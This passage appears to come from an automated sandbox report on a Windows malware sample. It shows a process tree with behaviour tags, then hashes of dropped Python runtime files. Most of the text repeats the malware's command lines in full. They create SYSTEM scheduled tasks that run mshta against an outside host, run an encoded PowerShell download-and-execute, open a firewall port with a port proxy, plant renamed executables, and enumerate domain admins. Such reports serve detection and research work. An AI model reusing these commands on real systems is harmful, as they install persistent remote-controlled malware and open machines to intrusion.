07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pTUICJFPF"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\CQLgUiaT.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\DuooWvQ.exe"&schtasks /run /TN escan)4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening tcp 65533 DNSd5⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exenetsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=535⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn DuooWvQ /tr "C:\Windows\DuooWvQ.exe" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\mayAGat" /tr "c:\windows\CQLgUiaT.exe" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c call "c:\windows\temp\tmp.vbs"2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo jhbajY >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\hash.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53© /y c:\windows\temp\svchost.exe c:\windows\DuooWvQ.exe&move /y c:\windows\temp\dig.exe c:\windows\CQLgUiaT.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn DuooWvQ /tr "C:\Windows\DuooWvQ.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\fNpuSeb" /tr "c:\windows\CQLgUiaT.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pTUICJFPF"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\CQLgUiaT.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\DuooWvQ.exe"&schtasks /run /TN escan)4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening tcp 65533 DNSd5⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exenetsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=535⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn DuooWvQ /tr "C:\Windows\DuooWvQ.exe" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\fNpuSeb" /tr "c:\windows\CQLgUiaT.exe" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c call "c:\windows\temp\tmp.vbs"2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo FXvx >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53© /y c:\windows\temp\svchost.exe c:\windows\AQzNdfKa.exe&move /y c:\windows\temp\dig.exe c:\windows\XHHdn.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn AQzNdfKa /tr "C:\Windows\AQzNdfKa.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\xpXhTaj" /tr "c:\windows\XHHdn.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pTUICJFPF"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\XHHdn.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\AQzNdfKa.exe"&schtasks /run /TN escan)4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening tcp 65533 DNSd5⤵
-
C:\Windows\SysWOW64\netsh.exenetsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=535⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn AQzNdfKa /tr "C:\Windows\AQzNdfKa.exe" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\xpXhTaj" /tr "c:\windows\XHHdn.exe" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c call "c:\windows\temp\tmp.vbs"2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo JsfCXd >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53© /y c:\windows\temp\svchost.exe c:\windows\dwnoz.exe&move /y c:\windows\temp\dig.exe c:\windows\DCioaAx.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn dwnoz /tr "C:\Windows\dwnoz.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\VCYwS" /tr "c:\windows\DCioaAx.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pTUICJFPF"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\DCioaAx.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\dwnoz.exe"&schtasks /run /TN escan)4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening tcp 65533 DNSd5⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exenetsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=535⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn dwnoz /tr "C:\Windows\dwnoz.exe" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\VCYwS" /tr "c:\windows\DCioaAx.exe" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c call "c:\windows\temp\tmp.vbs"2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c call "c:\windows\temp\tmp.vbs"2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo pohWckK >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53© /y c:\windows\temp\svchost.exe c:\windows\aAKrYQe.exe&move /y c:\windows\temp\dig.exe c:\windows\ybZokV.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn aAKrYQe /tr "C:\Windows\aAKrYQe.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\rPNMIu" /tr "c:\windows\ybZokV.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pTUICJFPF"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\ybZokV.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\aAKrYQe.exe"&schtasks /run /TN escan)4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening tcp 65533 DNSd5⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exenetsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=535⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn aAKrYQe /tr "C:\Windows\aAKrYQe.exe" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\rPNMIu" /tr "c:\windows\ybZokV.exe" /F5⤵
- Creates scheduled task(s)
-
C:\Windows\system32\taskeng.exetaskeng.exe {4F89A168-6683-436F-856F-CF330BDAE8DA} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\hqLA.exeC:\Windows\hqLA.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\hqLA.exeC:\Windows\hqLA.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c wmic ntdomain get domainname4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic ntdomain get domainname5⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c net localgroup administrators4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet localgroup administrators5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators6⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net group "domain admins" /domain4⤵
-
C:\Windows\SysWOW64\net.exenet group "domain admins" /domain5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 group "domain admins" /domain6⤵
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass "import-module C:\Windows\m2.ps1"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /all4⤵
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all5⤵
- Gathers network information
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all4⤵
- Gathers network information
-
C:\Windows\SysWOW64\netstat.exenetstat -na4⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\IvTOEzgJ.exeC:\Windows\IvTOEzgJ.exe1⤵
-
C:\Windows\CHVrgpSt.exeC:\Windows\CHVrgpSt.exe1⤵
-
C:\Windows\udkEbwEl.exeC:\Windows\udkEbwEl.exe1⤵
-
C:\Windows\HDnQjNKm.exeC:\Windows\HDnQjNKm.exe1⤵
-
C:\Windows\RLhjOHLP.exeC:\Windows\RLhjOHLP.exe1⤵
-
C:\Windows\maynOwmE.exeC:\Windows\maynOwmE.exe1⤵
-
C:\Windows\SysWOW64\cmd.execmd /c call "c:\windows\temp\tmp.vbs"2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\VAkHJhfp.exeC:\Windows\VAkHJhfp.exe1⤵
-
C:\Windows\gqEalohR.exeC:\Windows\gqEalohR.exe1⤵
-
C:\Windows\CPPIxHsB.exeC:\Windows\CPPIxHsB.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\TEMP\_MEI3202\Crypto.Cipher._AES.pydMD5
9fd78d7d6ab69af5a14e0f29affd7ef4
SHA134d9251f746f10f656542772c067a56fe686247c
SHA25687c920ed2c1afcf295729563b4def671dc9e36ef8b3e183d4836571300180e74
SHA51273768a900774cc6c96ac2a08589b42d00a2e8bab12dc7d7fa2f6f1b27ef0399668046d3bf94997f8a3a2af8653897f4861bcacfc03e039eba3a7847cd4e0c005
-
C:\Windows\TEMP\_MEI3202\Crypto.Cipher._ARC4.pydMD5
8d85dbf6c981bff4e8a1bea86a0ac5e9
SHA146c4cbc697a63547f2534c0e72e3c85fb98eef7b
SHA256356623219b8c098435d511c0055c061018641d8b700eb089fc6ff87d233260e1
SHA5126d199a2f449cb8fbceae63aa348722c0208b0b23c2c6e1bb17ffd8eb765cb6ca27b8c16fed276e6b7688a685d2230da62a8dbafe4f61a2bf96deca2a4c46ce72
-
C:\Windows\TEMP\_MEI3202\Crypto.Cipher._DES.pydMD5
4b7b86b41280dfd1e1d29a7f626393ef
SHA14917f788b4cd11996e1332d5f376ca0df41370b4
SHA2568b0f41fd5a3d78e7c4990b1df3414c4fa221624444f318bb0a29f92f02b1a15e
SHA51216cabc4bd25ad98d7b277f548a6feed1fb05facabe3796f19ff3a24fd1e2c04c958b4f8cdc7eb1bf3d7cec13e5d02e170a9838ec4d617fe20f4225ac50973b7e
-
C:\Windows\TEMP\_MEI3202\Crypto.Cipher._DES3.pydMD5
f6d78ab78381bf4056335a75ee7c8523
SHA1bcf4557c58cc41d72b2e3abdf3f44aeeb80a2871
SHA2565317f80ae3b32d6a3d4ce013bdf93f5d857e6625bc89c778171983e95865abe4
SHA51254089eef475b446ee12fab1d9e75b0fc1282392f38ce3a5da8c2b29ebd8d4c748033d1f9ca4d7a2254fa7cc464422e12db4af48d43f50f7f108ddb57a7f87d8a
-
C:\Windows\TEMP\_MEI3202\Crypto.Hash._MD4.pydMD5
f98765af6763cfe9ece7136f14f88397
SHA1d826bee700297b1be49c0a682709e87749bd5e38
SHA256d722ed0ee7fef1f30860f83b3fecfa089955ca0d6b522a379efdc34f0401e321
SHA51291e05639af5341405de909867981c345e57f4d1a6e51c5dbe9e31c70570d4bc695b0c3e4e4c241bbb7891fa9127ce5e9b0f8e1a643c2c3e056880bc1b6f582dd
-
C:\Windows\TEMP\_MEI3202\Crypto.Util.strxor.pydMD5
32dce0579bd19ff24bd4a1accf5afc73
SHA130ed1b74d91606f56d15636e4d0773edc575f011
SHA2562170b576f5f22d06e700e5570dc234fa5f77c7fe4af8394f0dac49566f9a8b40
SHA512a0a43a3f50ba4ab33f5dc96f51ed3d086913952a3f7cb1db181d94685a014dc2052e933fd32e46f26c08099a9586e6a4b423169324ce3de7f42aff1052d05b1a
-
C:\Windows\TEMP\_MEI3202\MSVCR90.dllMD5
cdbe9690cf2b8409facad94fac9479c9
SHA14bcdfe2c1b354645314a4ce26b55b2b1a0212db9
SHA2568e7fe1a1f3550c479ffd86a77bc9d10686d47f8727025bb891d8f4f0259354c8
SHA5129c84ed9a66ce20a22e14fa00c1a0db716133f7b2450a3c0d20b1dcf74e030337c4c6a4953e40e10fc94706dc607236e773ba8999b21bd6e072ab24a487e8f942
-
C:\Windows\TEMP\_MEI3202\_ctypes.pydMD5
98638a1bfdecdcecf4d7d47b521ac903
SHA1320dd42ee55cfd4016922d5927e1ca4967191315
SHA25611c739d28227773d70c3941d2e979b9d4cee12f1d53cc94daf77b62a4d3a0327
SHA512d1b8eef337219f35769d7061bd760a066522fbb34bde6f1d130897f6522aada2b9bfb15f49559a48534d6c656ef3edcd8689d7d76d72c5f022db3906306022d7
-
C:\Windows\TEMP\_MEI3202\_hashlib.pydMD5
22071845daf8c1f6e87f006673eed4fd
SHA1b3bc158d041aecc313900cf9a7205e13c47dd9a3
SHA25651c47389782bc2de8e401d231233e2e7f1a4b3afce7df4ddf4ad533184dad407
SHA5126a11c1620e60b35d321c340687e03a5d9c9eb07912d95c7ba8b9d25867f246b6f46e23d5ee5ec6999c38a92460e85efd8704100e81492c26e38ba3da0f0e5972
-
C:\Windows\TEMP\_MEI3202\_mssql.pydMD5
e0aa19ec9424664a61a8413cdf346a67
SHA1dd82a340c56a9e1ba895e081adc560a77565c8b5
SHA256d5253b4c05f1f82b066f4d59294dc3f531a74161161a1857d6bbb44d61639608
SHA512b039445276e9370200f1a03f58521b82ac794c5e24772c0dd2e27a08ad80ce179eeb1ca927e530f489354c695c3dd6c2a5301623abfbc9e13aef38b4b9009e06
-
C:\Windows\TEMP\_MEI3202\_multiprocessing.pydMD5
cc3b15be403249398c53d3e7d720893f
SHA11ae2c4090e6e5da395117a21618024ebe8c90219
SHA2566a6b8cb5cad9769a07af9a50bab5b3c848b411f66d7723c7e4c65d9e7dbe08ed
SHA5126ec8e0ea676d5cf5de775cb7fcb87b59d3c773bf5f080e75fbfded0b643af85341ad7c8f9b4153c25e11e3fbc751ddf620f7027037046081e2c23e49452cad13
-
C:\Windows\TEMP\_MEI3202\_socket.pydMD5
b7c3e334648a6cbb03b550b842818409
SHA1767be295f1e4adedf0e10532f9c1b7908d17383a
SHA256f0781a1b879584f494d984e31869eab13f0535825f68862e6597b1639df708bd
SHA51243ee04452b685022bfdbaca5b3603d4c0e406599b8da70c6a25fa2c4ac5543ada4521eba9bbf0ca86a2a4775ce474ab89da7d27f842d63df62048a1b7ca431d1
-
C:\Windows\TEMP\_MEI3202\_ssl.pydMD5
27a7a40b2b83578e0c3bffb5a167d67a
SHA1d20a7d3308990ce04839569b66f8639d6ed55848
SHA256ea0efcab32e6572f61a3c765356e283bd6a8f75ec2a4c8b12f1fb3db76ca68d4
SHA5127b97690b9ab68562ca85ce0ffc56ae517f8fafe44caff846d66bb4c2003aa6d1b0b321d9ea4526c4652b5152ec46dc600671f427957e6e847ba75ced0d09acef
-
C:\Windows\TEMP\_MEI3202\bz2.pydMD5
0b1688c02640ec14d85e1cc3c93f7276
SHA103779f13640f6786e3127c76316a35a2922fc149
SHA256753ea279675eeb34fe58908f10cb15886955c865b49c01b533a5930e6b326038
SHA5120b109bb5924b20cde6d33d335404a944c088d34f009412074d0569e62e1d3f5326f41b2a0b9afbe2ddbeb43e3054cecdd63829a7f88e6db6f72bce77a9f3ec82
-
C:\Windows\TEMP\_MEI3202\ii.exe.manifestMD5
08458035409af6baef39d93956f86e74
SHA1b37def646d1107919f16bb91353e6e5f20c2a168
SHA25682517610333e631b6df2d74e19f217d87824b0dfd39f9cdddecb416f1ee66808
SHA5122a9276d6de8cf9cbacf57d5b8bf169c4ae74f880467d5de12f06a0f4594622f64de17d4a407d4f9901a429d9fa215cc52658f9b0e6f1dc5af28c9ba79d51d674
-
C:\Windows\TEMP\_MEI3202\python27.dllMD5
f5c5c0d5d9e93d6e8cb66b825cd06230
SHA1da7be79dd502a89cf6f23476e5f661eebd89342b
SHA256e3eed66221a6552d4b9ae7350b3dc30de238a6029efae060514d2780c02fedb4
SHA5128a13b15884f8450396b8f18597dfe62f0e13e7ab524d95de5b7b0497a64e52f26b22f977803280b1916fc2b45c52a92ab501a6fb8ad86970d8326be72f735279
-
C:\Windows\TEMP\_MEI3202\pywintypes27.dllMD5
f3ef005e60f838eaaa44529daeeb93ab
SHA10f8730caea9f7b16c2e90f6551a90b80b994688f
SHA256241ecbd87410e9b23339d494f9eca7ddf8083472661989f489fdd7fe0b8776b4
SHA5128c57d5b6a5b44b26fb943b0d5ddd5d80eeac2488e91f538e361781e727f931717bb3d5a0811ae7c8dd85122e74b08c54c3384fd2fc0db79e0b0e7fbfc8160d20
-
C:\Windows\TEMP\_MEI3202\select.pydMD5
dcee0dbcf84cc9f1620f168d8f8f9fd1
SHA19f570fa253c24a8fe56948f4c6e79982d9644a3b
SHA256385e7a3cf5dd7b65590b064e7bc09f901db7ddc8542396af6bb60048a30993f0
SHA5125b89fe78e841bd05a7c4a626d9b06aa200f8c7d0ebf3b9124aa4440159636fc20ced725d2fe61de7bb4dc210060fddd36f785309a536293455cb863ebff00e77
-
C:\Windows\TEMP\_MEI3202\win32api.pydMD5
4808fc8e377c68afc58e512eaeb92984
SHA15d30fb56abd2a4e66108a8e8cd21450a7e29dcc4
SHA25663112adebc44d8183faa148e53cc48ddda0a9fb11c7d15a1ef5c8b36023f1205
SHA5127c8994a78022499561d69893c67c4f16dcc826ba42bed01bb079324c980946a50463737e7f96f13915aa0a2728ff4555d61c33d7c7375de69e0d71f9347f66f4
-
C:\Windows\TEMP\_MEI3202\win32event.pydMD5
997b91ab18b0e50a458b6093a77c1f51
SHA18d8f247600ba0210912270f960193fb039e57ba0
SHA2563f2d34661fd5cc1c800c121ad8ed1077ad62888a688fea23dcf2617aceed2d7c
SHA5123ee618c1759ccdb357817f50cab91f3f1d5d5af3b147539f711508a7debe5f57c69072189b9261af539b101047963f3a233a03517839592f431e2ac1f1ad9aff
-
